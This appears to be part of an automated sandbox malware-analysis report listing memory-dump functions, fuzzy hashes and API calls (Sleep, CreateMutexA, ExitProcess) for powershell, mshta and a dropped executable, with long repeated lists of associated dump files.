Instruction Fuzzy Hash: EF01A77020CB0D4FD748EF0CE451AA6B3E0FF85324F10052EE58AC3695D632E882CB42

Analysis Process: powershell.exePID: 7432, Parent PID: 2412COMMON

Executed Functions

Function 07450568 Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

$fq, xrefs: 0745068F
$fq, xrefs: 0745069F
$fq, xrefs: 07450634

Memory Dump Source

Source File: 00000022.00000002.2653411766.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq
API String ID: 0-837900676
Opcode ID: 7a2ac5ff9df4575107ef8fa49781f7a771ee057ff439ac4f7dbf98b0532a8eec
Instruction ID: 4c247df4f0fe346b4ba77d30043ced6fa11cb73e2030a0c7b387158a9676ca2b
Opcode Fuzzy Hash: 7a2ac5ff9df4575107ef8fa49781f7a771ee057ff439ac4f7dbf98b0532a8eec
Instruction Fuzzy Hash: 1F61F0B5714206DFDB249F78C8507EE7BE2AF85304F10846BE945CB2A2DB35D981CBA1

Function 049976A8 Relevance: 3.2, Strings: 2, Instructions: 669COMMON

Download Yara Rule

Strings

LRfq, xrefs: 04997755
(Xkq, xrefs: 04997837

Memory Dump Source

Source File: 00000022.00000002.2570839700.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_4990000_powershell.jbxd

Similarity

API ID:
String ID: (Xkq$LRfq
API String ID: 0-2385642249
Opcode ID: 4e5c13da94a82307e5ece0eff238f5bd20b3dc5730cf48625504037c1db6cb98
Instruction ID: ac6df0142bdaa17af049c15a5635aae2002f5bf0e5a7f6d87d345d02f950d1dc
Opcode Fuzzy Hash: 4e5c13da94a82307e5ece0eff238f5bd20b3dc5730cf48625504037c1db6cb98
Instruction Fuzzy Hash: 39528934B14218CFDB28DB68C850B6DB7B6EF89304F1184A9E9499B395DF70AD81CF52

Function 049974B0 Relevance: 2.9, Strings: 2, Instructions: 386COMMON

Download Yara Rule

Strings

LRfq, xrefs: 04997755
(Xkq, xrefs: 04997837

Memory Dump Source

Source File: 00000022.00000002.2570839700.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_4990000_powershell.jbxd

Similarity

API ID:
String ID: (Xkq$LRfq
API String ID: 0-2385642249
Opcode ID: 93b728e89c679df4a3590a6616d037f2b8827f92f5b960e77533e22c7e447911
Instruction ID: 65f18041ed6c59e9f4998fb419d7ccb00188c9aab3fc939df62c6a7b874aaf2b
Opcode Fuzzy Hash: 93b728e89c679df4a3590a6616d037f2b8827f92f5b960e77533e22c7e447911
Instruction Fuzzy Hash: C6514D34B14214CFDB24DF68D840BADBBB6EF89300F1185A9D5459B395DB71AC41CB92

Function 07450548 Relevance: 2.6, Strings: 2, Instructions: 117COMMON

Download Yara Rule

Strings

$fq, xrefs: 0745068F
$fq, xrefs: 07450634

Memory Dump Source

Source File: 00000022.00000002.2653411766.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: $fq$$fq
API String ID: 0-2537786760
Opcode ID: dec33f6067d80f45b0abb2258601547334f262e5e04797b6cfe6695fe60c08e1
Instruction ID: 4c4b7742368d2e56d40f542a8d9c4b1dea85bff4ca32716a2188c9b17b9fd241
Opcode Fuzzy Hash: dec33f6067d80f45b0abb2258601547334f262e5e04797b6cfe6695fe60c08e1
Instruction Fuzzy Hash: 3B41CCF8605246DFDB258F38C8407EA7BE1AF85344F5585A7E8448B2A3D730D980CBA2

Function 049929F0 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2570839700.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_4990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7e52b3f573ca8c77baec64e67ebef913a059b6bed5cc1d8a615fc1eafc7cb0b
Instruction ID: 09b8754f52b55f2d4db5abe6474b2e1769fb387fc9e038806fbf8135ce4f4c9d
Opcode Fuzzy Hash: c7e52b3f573ca8c77baec64e67ebef913a059b6bed5cc1d8a615fc1eafc7cb0b
Instruction Fuzzy Hash: 61915A74A00205AFCB15CF5DC4949AEBBF5FF48310B248AA9D915AB3A5C735FC51CBA0

Function 0499811A Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2570839700.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_4990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a2781c4a5e0bf72034bea71cf4ff98043416b5ef42487a28690a5b86b41cb3e
Instruction ID: 384922907ded98aadd889d9f79dfcfe76e793132ed764620a22b0e4ecd0bff9e
Opcode Fuzzy Hash: 8a2781c4a5e0bf72034bea71cf4ff98043416b5ef42487a28690a5b86b41cb3e
Instruction Fuzzy Hash: C5118F71A042488FCB15DFA8E890AADBBB1FF8A304F044599E545AF362DB31AC40CF61

Function 0480D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2568296914.000000000480D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0480D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_480d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f39f77ee723506939a74b10f2cb2378a195e67eeb54c055608e2f4f315f3b1b
Instruction ID: 5ff9bdc29a98b18eb8bd9131b6d63df7242899025fa9df86d19ce0d015d98dcf
Opcode Fuzzy Hash: 3f39f77ee723506939a74b10f2cb2378a195e67eeb54c055608e2f4f315f3b1b
Instruction Fuzzy Hash: 4D012B725053049AE7509EA5EDC0B67BFD8DF41334F18CA1AED4C8F1C6C678A841C6B1

Function 0480D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2568296914.000000000480D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0480D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_480d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0402af027b36568d760d78edd0d93af66a997b058630033cbdf55b1d01c8198
Instruction ID: ee18fa8d0c1339a80063b78d5247d3be1af2f37634f708af100c2e18ca6e4fba
Opcode Fuzzy Hash: a0402af027b36568d760d78edd0d93af66a997b058630033cbdf55b1d01c8198
Instruction Fuzzy Hash: DE018C6240E3C05EE7128B259D94B52BFB4DF53224F18C1CBD9888F1A7C2685849C772

Function 0499814A Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2570839700.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_4990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e9d62080618ec400d982dbab98304849c02ff213fe7185907dc991cefa9d9db
Instruction ID: 02fda5a96cdc7d88b348240037f742014c645788530c5000de6d67c53ecb206e
Opcode Fuzzy Hash: 7e9d62080618ec400d982dbab98304849c02ff213fe7185907dc991cefa9d9db
Instruction Fuzzy Hash: 71F039B0D0820A9FCF49DFB9C4522BEBFF0AB49200F1089AED859E7300E73456018F95

Function 04998158 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2570839700.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_4990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42690cd34743c0f5060b6fd117741e1a18f609cdcbc14ccfd7235a5e13914f40
Instruction ID: a978899627553e1b5ac2eb4f2b679645af9f5ada56c28e1c15d3d41a86de8a69
Opcode Fuzzy Hash: 42690cd34743c0f5060b6fd117741e1a18f609cdcbc14ccfd7235a5e13914f40
Instruction Fuzzy Hash: 85E02FB4D1420E9F8F88DFB995411BEFBF5AB49200F10857E9819E3340E63456118F95

Non-executed Functions

Function 074500F0 Relevance: 6.3, Strings: 5, Instructions: 71COMMON

Download Yara Rule

Strings

$fq, xrefs: 0745012A
$fq, xrefs: 07450136
Wh, xrefs: 0745017B
$fq, xrefs: 074500FF
Wh, xrefs: 0745016D

Memory Dump Source

Source File: 00000022.00000002.2653411766.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$Wh$Wh
API String ID: 0-1952159860
Opcode ID: 8bc4f3f2300798e2dcf2a6c6c2174763a0b857fd6c6ac61fcbd0e99c86122ab7
Instruction ID: 16267c49d210edefaa5843eb8d3151a956a02056f6e532d9a443a3a79401b651
Opcode Fuzzy Hash: 8bc4f3f2300798e2dcf2a6c6c2174763a0b857fd6c6ac61fcbd0e99c86122ab7
Instruction Fuzzy Hash: 5911ECB97043569BDB34497AC8057A7B797ABC1751F24842BEC458B3A2E933C441C752

Function 074503E8 Relevance: 5.0, Strings: 4, Instructions: 47COMMON

Download Yara Rule

Strings

$fq, xrefs: 0745043E
$fq, xrefs: 07450432
4'fq, xrefs: 07450453
4'fq, xrefs: 0745045F

Memory Dump Source

Source File: 00000022.00000002.2653411766.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$$fq$$fq
API String ID: 0-2206495126
Opcode ID: be0e2e8ff3f8c5147064809f9276b6c802420997089105879ea5073f03736728
Instruction ID: 25e209c0875508de43365699b1479b4c5505c830f3a039e528dd6605e7f95716
Opcode Fuzzy Hash: be0e2e8ff3f8c5147064809f9276b6c802420997089105879ea5073f03736728
Instruction Fuzzy Hash: 6201F261B1A2824FC7261B3C0C201A63FB66F83604729409BC482DB7A3CE258D46C3A3

Analysis Process: mshta.exePID: 3964, Parent PID: 6324COMMON

Executed Functions

Function 0000011CBB9F0FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000003.2485908710.0000011CBB9F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000011CBB9F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_3_11cbb9f0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 83cd5256f6edd49230ca2acde66dd44f6662b6e7c5ac783975a9f303ac6fb4a4
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 1E9002248DA44659E82815914C467DC505463882A0FE444804516D0144D44D12961196

Analysis Process: 483d2fa8a0d53818306efeb32d3.exePID: 6448, Parent PID: 7432COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1962
Total number of Limit Nodes:	11

Executed Functions

Function 000B652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,000B652A,?,?,?,?,?,000B7661), ref: 000B6566

Memory Dump Source

Source File: 00000038.00000002.2578804574.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Offset: 00080000, based on PE: true

Associated: 00000038.00000002.2578713082.0000000000080000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2578804574.00000000000E2000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579181371.00000000000E9000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579236948.00000000000EB000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579316647.00000000000F5000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579404793.00000000000F6000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579911453.00000000000F7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580594880.000000000024C000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580701326.000000000024E000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2582278305.0000000000267000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583070146.0000000000269000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.000000000026A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.0000000000271000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2589832578.00000000002A6000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590037425.00000000002A7000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590207477.00000000002AD000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590383058.00000000002BA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590537505.00000000002CE000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590817327.00000000002D4000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590969860.00000000002DB000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591234093.00000000002E0000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591350471.00000000002E7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591509037.00000000002EA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591612653.00000000002F4000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591702583.00000000002F9000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592112554.0000000000300000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592152218.0000000000305000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592287787.0000000000306000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592333678.0000000000308000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592536807.0000000000309000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592657286.0000000000311000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592703067.0000000000321000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592744311.0000000000322000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592891636.000000000032D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000032E000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000034A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593443476.000000000037D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593703294.000000000037F000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594172042.0000000000380000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594711040.0000000000383000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595108065.0000000000385000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595921887.0000000000393000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2596151555.0000000000395000.00000080.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_80000_483d2fa8a0d53818306efeb32d3.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 0edb81f9d1082c7dcda1f57fef632fe38f4aaca121311a3d9acb5ba15f6e42c0
Instruction ID: a992642da0e444666bfef7c05c58a1465ce4d8a40fdab52e52d5a82217f8c1da
Opcode Fuzzy Hash: 0edb81f9d1082c7dcda1f57fef632fe38f4aaca121311a3d9acb5ba15f6e42c0
Instruction Fuzzy Hash: 87E086300415086EDF357B18C805EC83B99EB52754F004D10FC0586226CB6AEE52C581

Function 00089BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0008A963
CreateMutexA.KERNELBASE(00000000,00000000,000E3254), ref: 0008A981

Memory Dump Source

Source File: 00000038.00000002.2578804574.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Offset: 00080000, based on PE: true

Associated: 00000038.00000002.2578713082.0000000000080000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2578804574.00000000000E2000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579181371.00000000000E9000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579236948.00000000000EB000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579316647.00000000000F5000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579404793.00000000000F6000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579911453.00000000000F7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580594880.000000000024C000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580701326.000000000024E000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2582278305.0000000000267000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583070146.0000000000269000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.000000000026A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.0000000000271000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2589832578.00000000002A6000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590037425.00000000002A7000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590207477.00000000002AD000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590383058.00000000002BA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590537505.00000000002CE000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590817327.00000000002D4000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590969860.00000000002DB000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591234093.00000000002E0000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591350471.00000000002E7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591509037.00000000002EA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591612653.00000000002F4000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591702583.00000000002F9000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592112554.0000000000300000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592152218.0000000000305000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592287787.0000000000306000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592333678.0000000000308000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592536807.0000000000309000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592657286.0000000000311000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592703067.0000000000321000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592744311.0000000000322000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592891636.000000000032D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000032E000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000034A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593443476.000000000037D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593703294.000000000037F000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594172042.0000000000380000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594711040.0000000000383000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595108065.0000000000385000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595921887.0000000000393000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2596151555.0000000000395000.00000080.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_80000_483d2fa8a0d53818306efeb32d3.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 969838696099d0d53751f19a4d7619906a654dcf75950692d93a2c5cc57778b7
Instruction ID: 0f4cb961590f3e2a480c84043fef47adfbb6916cb2ff5d976b9decfc1ce65b07
Opcode Fuzzy Hash: 969838696099d0d53751f19a4d7619906a654dcf75950692d93a2c5cc57778b7
Instruction Fuzzy Hash: F33139317042048BFB08BB6CDD897ADBB62BB82310F24861DE094D77D6C77699808752

Function 00089F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0008A963
CreateMutexA.KERNELBASE(00000000,00000000,000E3254), ref: 0008A981

Memory Dump Source

Source File: 00000038.00000002.2578804574.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Offset: 00080000, based on PE: true

Associated: 00000038.00000002.2578713082.0000000000080000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2578804574.00000000000E2000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579181371.00000000000E9000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579236948.00000000000EB000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579316647.00000000000F5000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579404793.00000000000F6000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579911453.00000000000F7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580594880.000000000024C000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580701326.000000000024E000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2582278305.0000000000267000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583070146.0000000000269000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.000000000026A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.0000000000271000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2589832578.00000000002A6000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590037425.00000000002A7000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590207477.00000000002AD000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590383058.00000000002BA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590537505.00000000002CE000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590817327.00000000002D4000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590969860.00000000002DB000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591234093.00000000002E0000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591350471.00000000002E7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591509037.00000000002EA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591612653.00000000002F4000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591702583.00000000002F9000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592112554.0000000000300000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592152218.0000000000305000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592287787.0000000000306000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592333678.0000000000308000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592536807.0000000000309000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592657286.0000000000311000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592703067.0000000000321000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592744311.0000000000322000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592891636.000000000032D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000032E000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000034A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593443476.000000000037D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593703294.000000000037F000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594172042.0000000000380000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594711040.0000000000383000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595108065.0000000000385000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595921887.0000000000393000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2596151555.0000000000395000.00000080.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_80000_483d2fa8a0d53818306efeb32d3.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 9f16f202f7ecfc8f57ca7ed944c99a857d5def976583049ea8844fe974ab0b1e
Instruction ID: 65df875f90d1fde8526a0531e1f66d8facdfac276140ef2bf79a738034f51dcd
Opcode Fuzzy Hash: 9f16f202f7ecfc8f57ca7ed944c99a857d5def976583049ea8844fe974ab0b1e
Instruction Fuzzy Hash: 0B3148317042049BFB18BB7CDC897ACBB62FB86310F24861EE094EB7D2C77599808752

Function 0008A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0008A963
CreateMutexA.KERNELBASE(00000000,00000000,000E3254), ref: 0008A981

Memory Dump Source

Source File: 00000038.00000002.2578804574.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Offset: 00080000, based on PE: true

Associated: 00000038.00000002.2578713082.0000000000080000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2578804574.00000000000E2000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579181371.00000000000E9000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579236948.00000000000EB000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579316647.00000000000F5000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579404793.00000000000F6000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579911453.00000000000F7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580594880.000000000024C000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580701326.000000000024E000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2582278305.0000000000267000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583070146.0000000000269000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.000000000026A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.0000000000271000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2589832578.00000000002A6000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590037425.00000000002A7000.00000040.00000001.01000000.00000015.sdmpDownload File
